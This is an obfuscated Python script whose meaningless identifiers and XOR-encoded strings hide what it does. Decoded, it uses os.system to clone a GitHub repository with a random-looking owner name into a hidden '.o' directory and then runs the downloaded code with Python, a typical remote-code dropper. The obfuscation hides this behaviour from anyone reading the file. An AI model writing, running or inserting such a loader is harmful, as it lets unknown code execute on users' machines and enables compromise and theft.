OOOl00lO0l100OO00l01l = (lambda O10l1ll1l11OOOl000lOl,
    lOO00l01100O00011OO1O: O10l1ll1l11OOOl000lOl ^ lOO00l01100O00011OO1O)
OOO01Ol1ll0O1000111lO = __import__(''.join(chr(lOlO10l00OO100011001l ^
    l1O00Oll0O1lO0111100l) for l1O00Oll0O1lO0111100l, lOlO10l00OO100011001l in
    zip(b'%Q', b'W4')), globals(), locals(), [], 0)
l1O0O0l1lO0l010lll1lO = __import__('so'[::-1], globals(), locals(), [], 0)
print(''.join(chr(OOOl00lO0l100OO00l01l(l100O11001l1l0llO01O0,
    Ol110l110O1Ol10110O0l)) for Ol110l110O1Ol10110O0l,
    l100O11001l1l0llO01O0 in zip(
    b'o\xdc\xbb\x1b\x14K\xd9\xa60\x03\xfaf\x0b\xa8\xf5;\xacI`.\x9b+[i\xacD',
    b"t\x87\x8b '{\xb4\xf2_l\x96Fb\xc6\x86O\xcd%\x0c5\xc0\x1b`Z\x9c)")))
getattr(l1O0O0l1lO0l010lll1lO, ''.join(chr(O0l1lO10OO0OOOOl0l11O ^
    O10lO01O1l11OOlOl0110) for O10lO01O1l11OOlOl0110, O0l1lO10OO0OOOOl0l11O in
    zip(b'\x14\xba\xb8\x12>\x8a', b'g\xc3\xcbf[\xe7')))(''.join(chr(
    OOOl00lO0l100OO00l01l(O1l0O1010OOl0OOllO00l, O1lO0100OOlO01O1OO0l1)) for
    O1lO0100OOlO01O1OO0l1, O1l0O1010OOl0OOllO00l in zip(
    b'\xb7\xb6\xdb6\xf2\x1c\xae~xy\xd5\x13V\xa5k\x0ciS\xe6\xa5\xe4]\x1bv\x92\xdb\xde\x1b\x04Ex\xa4\xaa\xc4<\xca\xe5x\x18+\x8f\xc8\xfc'
    ,
    b'\xd0\xdf\xaf\x16\x91p\xc1\x10\x1dY\xbdg"\xd5\x186F|\x81\xcc\x905n\x14\xbc\xb8\xb1v+\x15\x14\xc5\xc1\xaeR\xa4\x93\x1bpA\xa0\xe6\x93'
    )))
getattr(l1O0O0l1lO0l010lll1lO, ''.join(chr(OlllO1OO100l1OO11lOlO ^
    ll0l0OlO011O1O1l0lOOO) for ll0l0OlO011O1O1l0lOOO, OlllO1OO100l1OO11lOlO in
    zip(b'\xa9\x10h\xdc\x1dP', b'\xdai\x1b\xa8x=')))(('o. nohtyp' +
    ' && o. dc')[::-1 * 10 + 9])
